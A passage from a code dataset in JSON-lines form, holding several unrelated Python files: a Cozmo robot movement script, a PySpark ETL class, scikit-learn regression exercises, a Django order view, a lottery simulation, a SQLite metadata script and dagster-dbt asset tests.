direction))).wait_for_completed()\n robot.drive_straight(distance_mm(UNIT_DISTANCE_MM), cozmo.util.speed_mmps(100)).wait_for_completed()\n robot.turn_in_place(degrees(-90 * direction)).wait_for_completed()\n distance_x = distance_x + direction\n ###################################> play_anim\n robot.say_text(\"Now I am at x and y\").wait_for_completed()\n robot.play_anim(name=\"anim_petdetection_dog_03\").wait_for_completed()\n\n\n##########################################################>\n##########################################################> cozmo_program()\ndef cozmo_program(robot: cozmo.robot.Robot):\n start_position = (0, 0) # Starting position (0, 0)\n target_position = (2, 4) # Set your target position (x, y)\n move_to_target_position(robot, start_position, target_position)\n\n # If you want to start from a different position, uncomment and use the following code:\n start_position = (2, 4) # Set your starting position (a, b)\n target_position = (0, 0) # Set your target position (x, y)\n move_to_target_position(robot, start_position, target_position)\n\n##########################################################>\n##########################################################> run_program ()\nif __name__ == '__main__':\n cozmo.run_program(cozmo_program, use_viewer=False, force_viewer_on_top=False)\n\n","repo_name":"CozmoRobots/Variation3","sub_path":"Movement_Assignment.py","file_name":"Movement_Assignment.py","file_ext":"py","file_size_in_byte":2471,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"38150159673","text":"from pyspark.sql import SparkSession\nfrom pyspark.sql.functions import lit\nfrom pyspark.sql.functions import col\n\nclass ETLSuperStore:\n # Create the Spark Session and Path Folder\n def __init__(self):\n self.spark_session = (SparkSession.builder.master(\"local[*]\").appName(\"SuperStoreETL\").getOrCreate())\n self.path_folder = \"/home/pydev/workflow/dt_learn_data_science/spark/superstore\"\n\n def extractSales(self):\n self.salesDf = self.spark_session.read.option(\"header\", \"true\") \\\n .option(\"inferSchema\", \"true\")\\\n .option(\"sep\", \",\")\\\n .csv(f\"{self.path_folder}/data/Super_Store_Sales_*.csv\")\n\n # print(self.salesDf.count())\n # print(self.salesDf.show())\n # print(\"Hello\") \n\n# Main\netl = ETLSuperStore()\netl.extractSales()\n","repo_name":"edwinmesa/dt_learn_data_science","sub_path":"spark/superstore/superStoreClass.py","file_name":"superStoreClass.py","file_ext":"py","file_size_in_byte":836,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"24944164192","text":"# # In [1]:\r\n# import numpy as np\r\n# import matplotlib.pyplot as plt\r\n# X=np.array([[6],[8],[10],[14],[18]]).reshape(-1,1)\r\n# y=[7,9,13,17.5,18]\r\n# plt.figure()\r\n# plt.title('Pizza price plotted against diamater')\r\n# plt.xlabel('Diamter in inches')\r\n# plt.ylabel('Price in dollars')\r\n# plt.plot(X,y,'k.')\r\n# plt.axis([0,25,0,25])\r\n# plt.grid(True)\r\n# plt.show()\r\n#\r\n# # In [2]:\r\n# from sklearn.linear_model import LinearRegression\r\n# model = LinearRegression()\r\n# model.fit(X,y)\r\n# test_pizza=np.array([[8]])\r\n# predicted_price=model.predict(test_pizza)[0]\r\n# print('A 12\" pizza should cost: $%.2f' % predicted_price)\r\n# print('Residual sum of squares: %.2f' % np.mean((model.predict(X)-y)**2))\r\n# #\r\n#\r\n# # # In [2]:\r\n# import numpy as np\r\n# X=np.array([[6],[8],[10],[14],[18]]).reshape(-1,1)\r\n# x_bar=X.mean()\r\n# print(x_bar)\r\n# variance=((X-x_bar)**2).sum()/(X.shape[0]-1)\r\n# print(variance)\r\n# print(np.var(X,ddof=1))\r\n# #\r\n# # # In [4]:\r\n# y=np.array([7,9,13,17.5,18])\r\n# y_bar=y.mean()\r\n# covariance=np.multiply((X-x_bar).transpose(),y-y_bar).sum() / (X.shape[0]-1)\r\n# print(covariance)\r\n# print(np.cov(X.transpose(),y)[0][1])\r\n\r\n# In [1]:\r\nimport numpy as np\r\nfrom sklearn.linear_model import LinearRegression\r\n\r\nX_train=np.array([6,8,10,14,18]).reshape(-1,1)\r\ny_train=[7,9,13,17.5,18]\r\n\r\nX_test=np.array([8,9,11,16,12]).reshape(-1,1)\r\ny_test=[11,8.5,15,18,11]\r\n\r\nmodel=LinearRegression()\r\nmodel.fit(X_train,y_train)\r\nr_squared=model.score(X_test,y_test)\r\nprint(r_squared)","repo_name":"yzjbryant/YZJ_MIX_Code","sub_path":"Python_Code_Beginner/机器学习新/01.py","file_name":"01.py","file_ext":"py","file_size_in_byte":1480,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"70962810729","text":"from face_recognize import FaceRecognize\r\nfrom checkin_qrcode_reader import CheckInQRCodeReader\r\n\r\ndef qrCodeReader():\r\n print('Start QR Code Reader')\r\n checkInQRCodeReader = CheckInQRCodeReader()\r\n qrCodeData = checkInQRCodeReader.start()\r\n del checkInQRCodeReader\r\n print('Patient Detail : ', qrCodeData)\r\n\r\ndef faceRecognize():\r\n print('Start Face Recognition')\r\n faceRecognize = FaceRecognize()\r\n faceRecognize.initialize()\r\n faceRecognizedName = faceRecognize.start()\r\n del faceRecognize\r\n if len(faceRecognizedName) > 0 and faceRecognizedName[0] != 'Unknown':\r\n print('Patient Detail : ', faceRecognizedName[0])\r\n else:\r\n print('Face Recognition Failed')\r\n qrCodeReader()\r\n\r\ndef main():\r\n faceRecognize()\r\n\r\nmain()","repo_name":"Bala14/FaceRecognition","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":780,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"18773027120","text":"# coding=utf-8\n# -*- coding: utf-8 -*-\nfrom datetime import datetime\nfrom decimal import Decimal\n\nfrom django.db import transaction\nfrom django.http import JsonResponse\nfrom django.shortcuts import render\nfrom shopping_user.models import UserInfo\nfrom shopping_user.user_decorator import login\nfrom user_cart.models import CartInfo\nfrom shopping_goods.models import GoodsInfo\nfrom .models import OrderInfo,OrderDetailInfo\n\n@login\ndef order(request):\n uid = request.session['user_id']\n user= UserInfo.objects.get(pk=int(uid))\n orderid = request.GET.getlist('orderid')\n orderlist = []\n for id in orderid:\n orderlist.append(CartInfo.objects.get(id=int(id)))\n\n # 判断用户手机号是否为空,分别做展示\n if user.userphone == '':\n userphone = ''\n else:\n userphone = user.userphone[0:4] + \\\n '****' + user.userphone[-4:]\n context = {\n 'title':'提交订单',\n 'user_order':1,\n 'page_name':1,\n 'user':user,\n 'orderlist':orderlist,\n 'userphone':userphone\n }\n return render(request,'user_order/place_order.html',context)\n\n@transaction.atomic()\n@login\ndef order_handle(request):\n #保存一个事物点\n tran_id = transaction.savepoint()\n #接收购物车编号\n # 根据POST和session获取信息\n # cart_ids=post.get('cart_ids')\n try:\n post = request.POST\n orderlist = post.getlist('id[]')\n total = post.get('total')\n address = post.get('address')\n\n order=OrderInfo()\n now=datetime.now()\n uid = request.session.get('user_id')\n order.oid='%s%d'%(now.strftime('%Y%m%d%H%M%S'),uid)\n order.user_id=uid\n order.odate=now\n order.ototal=Decimal(total)\n order.oadd = address\n order.save()\n\n # 遍历购物车中提交信息,创建订单详情表\n for orderid in orderlist:\n cartinfo = CartInfo.objects.get(id=orderid)\n good = GoodsInfo.objects.get(cartinfo__id=cartinfo.id)\n\n # 判断库存是否够\n if int(good.gstock) >= int(cartinfo.count):\n # 库存够,移除购买数量并保存\n good.gstock -= int(cartinfo.count)\n good.save()\n\n goodinfo = GoodsInfo.objects.get(cartinfo__id=orderid)\n\n # 创建订单详情表\n detailinfo = OrderDetailInfo()\n detailinfo.goods_id = int(goodinfo.id)\n detailinfo.order_id = int(order.oid)\n detailinfo.price = Decimal(int(goodinfo.gprice))\n detailinfo.count = int(cartinfo.count)\n detailinfo.save()\n\n # 循环删除购物车对象\n cartinfo.delete()\n else:\n # 库存不够出发事务回滚\n transaction.savepoint_rollback(tran_id)\n # 返回json供前台提示失败\n return JsonResponse({'status': 2})\n except Exception as e:\n print('==================%s'%e)\n transaction.savepoint_rollback(tran_id)\n # 返回json供前台提示成功\n return JsonResponse({'status': 1})\n\n@transaction.atomic()\ndef pay(request,oid):\n order=OrderInfo.objects.get(oid=oid)\n order.oIspay=True\n order.save()\n context={'order':order}\n return render(request,'df_order/pay.html',context)","repo_name":"bibiwannabe/Django-ShoppingWebsite","sub_path":"shopping/user_order/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3391,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"21683763102","text":"import random\nimport requests\nimport json\nfrom pprint import pprint\n# 정원이 코드\nurl = 'https://dhlottery.co.kr/common.do?method=getLottoNumber&drwNo=860'\nres = requests.get(url)\nlottery = res.json()\n\nwinner = set([])\nfor i in range(1, 7) :\n winner.add(lottery[f'drwtNo{i}'])\n\nbonus = set([lottery['bnusNo']])\n\ncount = 0\nfirst = 0\nsecond = 0\nthird = 0\nforth = 0\nfifth = 0\n\nwhile True :\n numbers = set(random.sample(range(1, 46), 6))\n\n jackpot = winner & numbers\n lucky = bonus & numbers\n\n if len(jackpot) == 6 :\n first += 1\n first_num = numbers\n break\n elif len(jackpot) == 5 and len(lucky) == 1 :\n second += 1\n elif len(jackpot) == 5 :\n third += 1\n elif len(jackpot) == 4 :\n forth += 1\n elif len(jackpot) == 3 :\n fifth += 1\n\n count += 1\n\nreward_all = count * 1000\nreward_5 = 5000 * fifth\nreward_4 = 50000 * forth\nreward_3 = int(( reward_all - ( reward_4 + reward_5 )) * 0.125 / third)\nreward_2 = int(( reward_all - ( reward_4 + reward_5 )) * 0.125 / second)\nreward_1 = int(( reward_all - ( reward_4 + reward_5 )) * 0.75 / first)\n\nprint('로또 제 860회')\nprint(f'총 구매자 수 : {count}')\nprint(f'총 당첨금 : {reward_all}')\nprint(f'당첨번호 {winner} + {bonus}')\nprint('------------------------------------')\nprint(f'1등 당첨자 수 : {first}')\nprint(f'1등 당첨금 : {reward_1}')\nprint('------------------------------------')\nprint(f'2등 당첨자 수 : {second}')\nprint(f'2등 당첨금 : {reward_2}')\nprint('------------------------------------')\nprint(f'3등 당첨자 수 : {third}')\nprint(f'3등 당첨금 : {reward_3}')\nprint('------------------------------------')\nprint(f'4등 당첨자 수 : {forth}')\nprint(f'4등 당첨금 : {50000}')\nprint('------------------------------------')\nprint(f'5등 당첨자 수 : {fifth}')\nprint(f'5등 당첨금 : {5000}')\nprint('------------------------------------')\nprint(f'기부자 수 : {count - first - second - third - forth - fifth}')","repo_name":"gtj1323/DjangoStudy","sub_path":"dict_project/lotto_2_other3.py","file_name":"lotto_2_other3.py","file_ext":"py","file_size_in_byte":1991,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"30692411700","text":"import sqlalchemy\nfrom sqlalchemy.ext.automap import automap_base\nfrom sqlalchemy.orm import Session\nfrom sqlalchemy import create_engine, func\n\nimport datetime as dt\nimport numpy as np\nimport pandas as pd\n\n\n## Create engine using the `belly_button_biodiversity.sqlite` database file\n#engine = create_engine(\"sqlite:///belly_button_biodiversity.sqlite\")\n## Declare a Base using `automap_base()`\n#Base = automap_base()\n## Use the Base class to reflect the database tables\n#Base.prepare(engine, reflect=True)\n## Assign the samples class to a variable called `Samples`\n#Samples = Base.classes\n## Create a session\n#session = Session(engine)\n## Create connection\n#conn = engine.connect()\n\n\n# def get_sample_names():\n# '''List of sample names'''\n# sample_names = []\n# first_row = session.query(Samples).first()\n# abc = first_row.__dict__\n# for key in abc:\n# sample_names.append(key)\n# sample_names.sort()\n# sample_names = sample_names[0:-2]\n# # return render_template('index.html', samplenames = sample_names) \n# print(sample_names)\n\n# get_sample_names()\n\n#def get_otu_descriptions():\n# '''List of OTU descriptions'''\n# otu_list = []\n# # first_row = session.query(Samples.otu).first()\n# # abc = first_row.__dict__\n# for row in session.query(Samples.otu.lowest_taxonomic_unit_found).all():\n# otu_list.append(row[0])\n# print(otu_list)\n\n#get_otu_descriptions()\n\n#def get_default_values():\n# '''OTU IDs and Sample Values for a given sample.'''\n# data_samples = pd.read_sql(\"SELECT * FROM samples\", conn)\n# default_dict={}\n# default_data = []\n# for c in data_samples.columns[1:]:\n# sample_values = []\n# otu_id = []\n#\n# for x in range(len(data_samples[c])):\n# if data_samples[c][x] != 0: \n# sample_values.append(data_samples[c][x])\n# otu_id.append(data_samples['otu_id'][x])\n# temp_df = pd.DataFrame({'sample_values': sample_values, 'otu_id': otu_id}, \n# columns=['sample_values', 'otu_id'])\n# temp_df = temp_df.sort_values('sample_values', ascending=False).reset_index(drop=True)\n# s_list = list(temp_df.sample_values)\n# o_list = list(temp_df.otu_id)\n# \n# default_dict['otu_ids'] = o_list[0:11]\n# default_dict['sample_values'] = s_list[0:11]\n# \n# default_data = [{\n# \"labels\": o_list[0:11],\n# \"values\": s_list[0:11],\n# \"type\": \"pie\"}]\n# print (default_data)\n# \n#get_default_values()\n\n#def get_default_values2():\n# '''OTU IDs and Sample Values for a given sample.'''\n# data_samples = pd.read_sql(\"SELECT * FROM samples\", conn)\n# final_list=[]\n# count = 1\n# for c in data_samples.columns[1:]:\n# # print(c)\n# all_sample_info = {}\n# sample_values = []\n# otu_id = []\n# # print(len(data_samples[c]))\n# for x in range(len(data_samples[c])):\n# # print(len(data_samples[c]))\n# # print(data_samples[c][x])\n# # print(data_samples['otu_id'][x])\n# if data_samples[c][x] != 0: \n# sample_values.append(data_samples[c][x])\n# otu_id.append(data_samples['otu_id'][x])\n# temp_df = pd.DataFrame({'sample_values': sample_values, 'otu_id': otu_id}, \n# columns=['sample_values', 'otu_id'])\n# temp_df = temp_df.sort_values('sample_values', ascending=False).reset_index(drop=True)\n# s_values = []\n# o_values = []\n# for x in range(len(temp_df['sample_values'])):\n# s_values.append(temp_df.sample_values[x])\n# o_values.append(temp_df.otu_id[x])\n#\n# all_sample_info['otu_ids'] = o_values[0:11]\n# all_sample_info['sample_values'] = s_values[0:11]\n# all_sample_info_dict = {}\n# all_sample_info_dict[data_samples.columns[count]]=all_sample_info\n# final_list.append(all_sample_info_dict)\n# count += 1\n# print(final_list)\n# \n#get_default_values2()\n\n\n\n#def get_default_values3():\n# data_samples = pd.read_sql(\"SELECT * FROM samples\", conn)\n#\n# final_list=[]\n# count = 1\n# for c in data_samples.columns[1:]:\n# # print(c)\n# all_sample_info = {}\n# sample_values = []\n# otu_id = []\n# # print(len(data_samples[c]))\n# for x in range(len(data_samples[c])):\n# # print(len(data_samples[c]))\n# # print(data_samples[c][x])\n# # print(data_samples['otu_id'][x])\n# if data_samples[c][x] != 0: \n# sample_values.append(data_samples[c][x])\n# otu_id.append(data_samples['otu_id'][x])\n# temp_df = pd.DataFrame({'sample_values': sample_values, 'otu_id': otu_id}, \n# columns=['sample_values', 'otu_id'])\n# temp_df = temp_df.sort_values('sample_values', ascending=False).reset_index(drop=True)\n# temp_df['sample_values'] = temp_df['sample_values'].astype(float)\n# temp_df['otu_id'] = temp_df['otu_id'].astype(str)\n# s_values = []\n# o_values = []\n# for x in range(len(temp_df['sample_values'])):\n# s_values.append(temp_df.sample_values[x])\n# o_values.append(temp_df.otu_id[x])\n#\n# all_sample_info['otu_ids'] = o_values[0:11]\n# all_sample_info['sample_values'] = s_values[0:11]\n# all_sample_info_dict = {}\n# all_sample_info_dict[data_samples.columns[count]]=all_sample_info\n# final_list.append(all_sample_info_dict)\n# count += 1\n# print(final_list)\n#get_default_values3()\n\n\n#\n#\n#def get_metadata(sample1):\n# '''Get Metadata of given sample id'''\n# # Create engine using the `belly_button_biodiversity.sqlite` database file\n# engine = create_engine(\"sqlite:///belly_button_biodiversity.sqlite\")\n# # Declare a Base using `automap_base()`\n# Base = automap_base()\n# # Use the Base class to reflect the database tables\n# Base.prepare(engine, reflect=True)\n# # Assign the samples class to a variable called `Samples`\n## Samples2 = Base.classes\n# # Create a session\n## session = Session(engine)\n# conn = engine.connect()\n# \n# metadata_info = {}\n#\n# data = pd.read_sql(\"SELECT * FROM samples_metadata\", conn)\n# data['SAMPLEID2'] = ''\n# for x in range(len(data.SAMPLEID)):\n# data.SAMPLEID2[x] = \"BB_\" + str(data.SAMPLEID[x]) \n#\n# sample_metadata = data[['SAMPLEID2', 'AGE', 'BBTYPE', 'ETHNICITY', 'GENDER', 'LOCATION', 'SAMPLEID']]\n# sample_metadata.set_index(\"SAMPLEID2\", inplace=True)\n# sample_metadata = sample_metadata.transpose()\n# sample_metadata.to_json('resources/sample_metadata.json')\n# sample_metadata_json = pd.read_json('resources/sample_metadata.json')\n# \n# metadata_info['AGE'] = sample_metadata_json[sample1]['AGE']\n# metadata_info['BBTYPE'] = sample_metadata_json[sample1]['BBTYPE']\n# metadata_info['ETHNICITY'] = sample_metadata_json[sample1]['ETHNICITY']\n# metadata_info['GENDER'] = sample_metadata_json[sample1]['GENDER']\n# metadata_info['LOCATION'] = sample_metadata_json[sample1]['LOCATION']\n# metadata_info['SAMPLEID'] = sample_metadata_json[sample1]['SAMPLEID']\n# print(metadata_info)\n# \n#get_metadata('BB_940')\n\n\n\n\ndef get_metadata():\n '''Get Metadata of given sample id'''\n # Create engine using the `belly_button_biodiversity.sqlite` database file\n engine = create_engine(\"sqlite:///belly_button_biodiversity.sqlite\")\n # Declare a Base using `automap_base()`\n Base = automap_base()\n # Use the Base class to reflect the database tables\n Base.prepare(engine, reflect=True)\n # Assign the samples class to a variable called `Samples`\n# Samples2 = Base.classes\n # Create a session\n# session = Session(engine)\n conn = engine.connect()\n\n data = pd.read_sql(\"SELECT * FROM samples_metadata\", conn)\n# data['SAMPLEID2'] = ''\n# for x in range(len(data.SAMPLEID)):\n# data.SAMPLEID2[x] = \"BB_\" + str(data.SAMPLEID[x]) \n\n sample_metadata = data[['AGE', 'BBTYPE', 'ETHNICITY', 'GENDER', 'LOCATION', 'SAMPLEID']]\n xyz = []\n for x in range(len(sample_metadata.SAMPLEID)):\n xyz.append(\"BB_\" + str(sample_metadata.SAMPLEID[x]))\n sample_metadata = sample_metadata.assign(SAMPLEID2=xyz)\n sample_metadata1=pd.DataFrame(sample_metadata['AGE'].astype(int))\n sample_metadata1['BBTYPE']=sample_metadata['BBTYPE'].astype(str)\n sample_metadata1['ETHNICITY']=sample_metadata['ETHNICITY'].astype(str)\n sample_metadata1['GENDER']=sample_metadata['GENDER'].astype(str)\n sample_metadata1['LOCATION']=sample_metadata['LOCATION'].astype(str)\n sample_metadata1['SAMPLEID']=sample_metadata['SAMPLEID'].astype(int)\n sample_metadata1['SAMPLEID2']=sample_metadata['SAMPLEID2'].astype(str)\n \n sample_metadata1.set_index(\"SAMPLEID2\", inplace=True)\n \n sample_metadata1 = sample_metadata1.transpose()\n \n metadata_list = []\n for x in range(len(sample_metadata1.columns)):\n metadata_info = {}\n col = sample_metadata1.columns[x]\n metadata_info['AGE'] = sample_metadata1[col]['AGE']\n metadata_info['BBTYPE'] = sample_metadata1[col]['BBTYPE']\n metadata_info['ETHNICITY'] = sample_metadata1[col]['ETHNICITY']\n metadata_info['GENDER'] = sample_metadata1[col]['GENDER']\n metadata_info['LOCATION'] = sample_metadata1[col]['LOCATION']\n metadata_info['SAMPLEID'] = sample_metadata1[col]['SAMPLEID']\n metadata_sample = {}\n metadata_sample[col]=metadata_info\n metadata_list.append(metadata_sample)\n print(metadata_list)\n\nget_metadata()","repo_name":"Niyatihd/interactivevisualizationchallenge","sub_path":"d123.py","file_name":"d123.py","file_ext":"py","file_size_in_byte":9656,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"14428695949","text":"\"\"\"\nEnvironment Informations for the Erina Project\\n\n\nErina Project\\n\n© Anime no Sekai - 2020\n\"\"\"\n\n\nimport os\nimport sys\nimport pkg_resources\nimport time\n\n\n##### SYSTEM AND PROCESS INFO\ntry:\n _ = startTime\nexcept:\n startTime = time.time()\ncpu_count = os.cpu_count()\nworking_dir = os.getcwd()\npid = os.getpid()\nsystem = os.name\n\n##### PYTHON INFO\npython_version = sys.version\npython_version_info = sys.version_info\npython_implementation = sys.implementation\npython_apiversion = sys.api_version\npython_executable_path = sys.executable\npython_builtin_module_names = sys.builtin_module_names\npython_path = sys.path\npython_installed_modules = []\nfor pkg in pkg_resources.working_set:\n python_installed_modules.append(pkg)\n\n##### ENV INFO\nerina_dir = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\nerina_version = \"v2.0-024 (Beta)\"\n","repo_name":"Animenosekai/Project_Erina","sub_path":"Erina/env_information.py","file_name":"env_information.py","file_ext":"py","file_size_in_byte":849,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"53"} +{"seq_id":"9892764107","text":"import json\nimport os\nfrom pathlib import Path\nfrom typing import AbstractSet, Any, Mapping, Optional\n\nimport pytest\nfrom dagster import (\n AssetKey,\n AutoMaterializePolicy,\n BackfillPolicy,\n DagsterInvalidDefinitionError,\n DailyPartitionsDefinition,\n Definitions,\n DependencyDefinition,\n FreshnessPolicy,\n LastPartitionMapping,\n NodeInvocation,\n PartitionMapping,\n PartitionsDefinition,\n TimeWindowPartitionMapping,\n asset,\n)\nfrom dagster._core.definitions.utils import DEFAULT_IO_MANAGER_KEY\nfrom dagster._core.execution.context.compute import AssetExecutionContext\nfrom dagster_dbt.asset_decorator import dbt_assets\nfrom dagster_dbt.core.resources_v2 import DbtCliResource\nfrom dagster_dbt.dagster_dbt_translator import DagsterDbtTranslator\nfrom dagster_dbt.dbt_manifest import DbtManifestParam\n\npytest.importorskip(\"dbt.version\", minversion=\"1.4\")\n\n\nmanifest_path = Path(__file__).joinpath(\"..\", \"sample_manifest.json\").resolve()\nmanifest = json.loads(manifest_path.read_bytes())\n\ntest_dagster_metadata_manifest_path = (\n Path(__file__)\n .joinpath(\"..\", \"dbt_projects\", \"test_dagster_metadata\", \"manifest.json\")\n .resolve()\n)\ntest_dagster_metadata_manifest = json.loads(test_dagster_metadata_manifest_path.read_bytes())\n\ntest_python_interleaving_manifest_path = (\n Path(__file__)\n .joinpath(\"..\", \"dbt_projects\", \"test_dagster_dbt_python_interleaving\", \"manifest.json\")\n .resolve()\n)\ntest_python_interleaving_manifest = json.loads(test_python_interleaving_manifest_path.read_bytes())\n\n\n@pytest.mark.parametrize(\"manifest\", [manifest, manifest_path, os.fspath(manifest_path)])\ndef test_manifest_argument(manifest: DbtManifestParam):\n @dbt_assets(manifest=manifest)\n def my_dbt_assets():\n ...\n\n assert my_dbt_assets.keys == {\n AssetKey.from_user_string(key)\n for key in [\n \"sort_by_calories\",\n \"cold_schema/sort_cold_cereals_by_calories\",\n \"subdir_schema/least_caloric\",\n \"sort_hot_cereals_by_calories\",\n \"orders_snapshot\",\n \"cereals\",\n ]\n }\n\n\n@pytest.mark.parametrize(\n \"select,exclude,expected_asset_names\",\n [\n (\n \"*\",\n None,\n {\n \"sort_by_calories\",\n \"cold_schema/sort_cold_cereals_by_calories\",\n \"subdir_schema/least_caloric\",\n \"sort_hot_cereals_by_calories\",\n \"orders_snapshot\",\n \"cereals\",\n },\n ),\n (\n \"+least_caloric\",\n None,\n {\"sort_by_calories\", \"subdir_schema/least_caloric\", \"cereals\"},\n ),\n (\n \"sort_by_calories least_caloric\",\n None,\n {\"sort_by_calories\", \"subdir_schema/least_caloric\"},\n ),\n (\n \"tag:bar+\",\n None,\n {\n \"sort_by_calories\",\n \"cold_schema/sort_cold_cereals_by_calories\",\n \"subdir_schema/least_caloric\",\n \"sort_hot_cereals_by_calories\",\n \"orders_snapshot\",\n },\n ),\n (\n \"tag:foo\",\n None,\n {\"sort_by_calories\", \"cold_schema/sort_cold_cereals_by_calories\"},\n ),\n (\n \"tag:foo,tag:bar\",\n None,\n {\"sort_by_calories\"},\n ),\n (\n None,\n \"sort_hot_cereals_by_calories\",\n {\n \"sort_by_calories\",\n \"cold_schema/sort_cold_cereals_by_calories\",\n \"subdir_schema/least_caloric\",\n \"cereals\",\n \"orders_snapshot\",\n },\n ),\n (\n None,\n \"+least_caloric\",\n {\n \"cold_schema/sort_cold_cereals_by_calories\",\n \"sort_hot_cereals_by_calories\",\n \"orders_snapshot\",\n },\n ),\n (\n None,\n \"sort_by_calories least_caloric\",\n {\n \"cold_schema/sort_cold_cereals_by_calories\",\n \"sort_hot_cereals_by_calories\",\n \"orders_snapshot\",\n \"cereals\",\n },\n ),\n (\n None,\n \"tag:foo\",\n {\n \"subdir_schema/least_caloric\",\n \"sort_hot_cereals_by_calories\",\n \"orders_snapshot\",\n \"cereals\",\n },\n ),\n (\n \"*\",\n \"tag:does-not-exist\",\n {\n \"sort_by_calories\",\n \"cold_schema/sort_cold_cereals_by_calories\",\n \"subdir_schema/least_caloric\",\n \"sort_hot_cereals_by_calories\",\n \"orders_snapshot\",\n \"cereals\",\n },\n ),\n ],\n)\ndef test_selections(\n select: Optional[str], exclude: Optional[str], expected_asset_names: AbstractSet[str]\n) -> None:\n @dbt_assets(\n manifest=manifest,\n select=select or \"fqn:*\",\n exclude=exclude,\n )\n def my_dbt_assets():\n ...\n\n expected_asset_keys = {AssetKey(key.split(\"/\")) for key in expected_asset_names}\n assert my_dbt_assets.keys == expected_asset_keys\n\n expected_select_tag = \"fqn:*\" if select is None else select\n assert my_dbt_assets.op.tags.get(\"dagster-dbt/select\") == expected_select_tag\n assert my_dbt_assets.op.tags.get(\"dagster-dbt/exclude\") == exclude\n\n\n@pytest.mark.parametrize(\"name\", [None, \"custom\"])\ndef test_with_custom_name(name: Optional[str]) -> None:\n @dbt_assets(manifest=manifest, name=name)\n def my_dbt_assets():\n ...\n\n expected_name = name or \"my_dbt_assets\"\n\n assert my_dbt_assets.op.name == expected_name\n\n\n@pytest.mark.parametrize(\n \"partitions_def\", [None, DailyPartitionsDefinition(start_date=\"2023-01-01\")]\n)\ndef test_partitions_def(partitions_def: Optional[PartitionsDefinition]) -> None:\n @dbt_assets(manifest=manifest, partitions_def=partitions_def)\n def my_dbt_assets():\n ...\n\n assert my_dbt_assets.partitions_def == partitions_def\n\n\n@pytest.mark.parametrize(\"io_manager_key\", [None, \"my_io_manager_key\"])\ndef test_io_manager_key(io_manager_key: Optional[str]) -> None:\n @dbt_assets(manifest=manifest, io_manager_key=io_manager_key)\n def my_dbt_assets():\n ...\n\n expected_io_manager_key = DEFAULT_IO_MANAGER_KEY if io_manager_key is None else io_manager_key\n\n for output_def in my_dbt_assets.node_def.output_defs:\n assert output_def.io_manager_key == expected_io_manager_key\n\n\ndef test_backfill_policy():\n backfill_policy = BackfillPolicy.single_run()\n\n @dbt_assets(\n manifest=manifest,\n partitions_def=DailyPartitionsDefinition(start_date=\"2023-01-01\"),\n backfill_policy=backfill_policy,\n )\n def my_dbt_assets():\n ...\n\n assert my_dbt_assets.backfill_policy == backfill_policy\n\n\ndef test_op_tags():\n @dbt_assets(manifest=manifest, op_tags={\"a\": \"b\", \"c\": \"d\"})\n def my_dbt_assets():\n ...\n\n assert my_dbt_assets.op.tags == {\n \"a\": \"b\",\n \"c\": \"d\",\n \"kind\": \"dbt\",\n \"dagster-dbt/select\": \"fqn:*\",\n }\n\n @dbt_assets(manifest=manifest, op_tags={\"a\": \"b\", \"c\": \"d\"}, select=\"+least_caloric\")\n def my_dbt_assets_with_select():\n ...\n\n assert my_dbt_assets_with_select.op.tags == {\n \"a\": \"b\",\n \"c\": \"d\",\n \"kind\": \"dbt\",\n \"dagster-dbt/select\": \"+least_caloric\",\n }\n\n @dbt_assets(manifest=manifest, op_tags={\"a\": \"b\", \"c\": \"d\"}, exclude=\"+least_caloric\")\n def my_dbt_assets_with_exclude():\n ...\n\n assert my_dbt_assets_with_exclude.op.tags == {\n \"a\": \"b\",\n \"c\": \"d\",\n \"kind\": \"dbt\",\n \"dagster-dbt/exclude\": \"+least_caloric\",\n \"dagster-dbt/select\": \"fqn:*\",\n }\n\n @dbt_assets(\n manifest=manifest,\n op_tags={\"a\": \"b\", \"c\": \"d\"},\n select=\"+least_caloric\",\n exclude=\"least_caloric\",\n )\n def my_dbt_assets_with_select_and_exclude():\n ...\n\n assert my_dbt_assets_with_select_and_exclude.op.tags == {\n \"a\": \"b\",\n \"c\": \"d\",\n \"kind\": \"dbt\",\n \"dagster-dbt/select\": \"+least_caloric\",\n \"dagster-dbt/exclude\": \"least_caloric\",\n }\n\n with pytest.raises(\n DagsterInvalidDefinitionError,\n match=(\n \"To specify a dbt selection, use the 'select' argument, not 'dagster-dbt/select'\"\n \" with op_tags\"\n ),\n ):\n\n @dbt_assets(\n manifest=manifest,\n op_tags={\n \"a\": \"b\",\n \"c\": \"d\",\n \"dagster-dbt/select\": \"+least_caloric\",\n },\n )\n def select_tag():\n ...\n\n with pytest.raises(\n DagsterInvalidDefinitionError,\n match=(\n \"To specify a dbt exclusion, use the 'exclude' argument, not 'dagster-dbt/exclude'\"\n \" with op_tags\"\n ),\n ):\n\n @dbt_assets(\n manifest=manifest,\n op_tags={\n \"a\": \"b\",\n \"c\": \"d\",\n \"dagster-dbt/exclude\": \"+least_caloric\",\n },\n )\n def exclude_tag():\n ...\n\n\ndef test_with_asset_key_replacements() -> None:\n class CustomizedDagsterDbtTranslator(DagsterDbtTranslator):\n @classmethod\n def get_asset_key(cls, dbt_resource_props: Mapping[str, Any]) -> AssetKey:\n return AssetKey([\"prefix\", *super().get_asset_key(dbt_resource_props).path])\n\n @dbt_assets(manifest=manifest, dagster_dbt_translator=CustomizedDagsterDbtTranslator())\n def my_dbt_assets():\n ...\n\n assert my_dbt_assets.keys_by_input_name == {\n \"__subset_input__cereals\": AssetKey([\"prefix\", \"cereals\"]),\n \"__subset_input__sort_by_calories\": AssetKey([\"prefix\", \"sort_by_calories\"]),\n }\n assert set(my_dbt_assets.keys_by_output_name.values()) == {\n AssetKey([\"prefix\", \"cereals\"]),\n AssetKey([\"prefix\", \"cold_schema\", \"sort_cold_cereals_by_calories\"]),\n 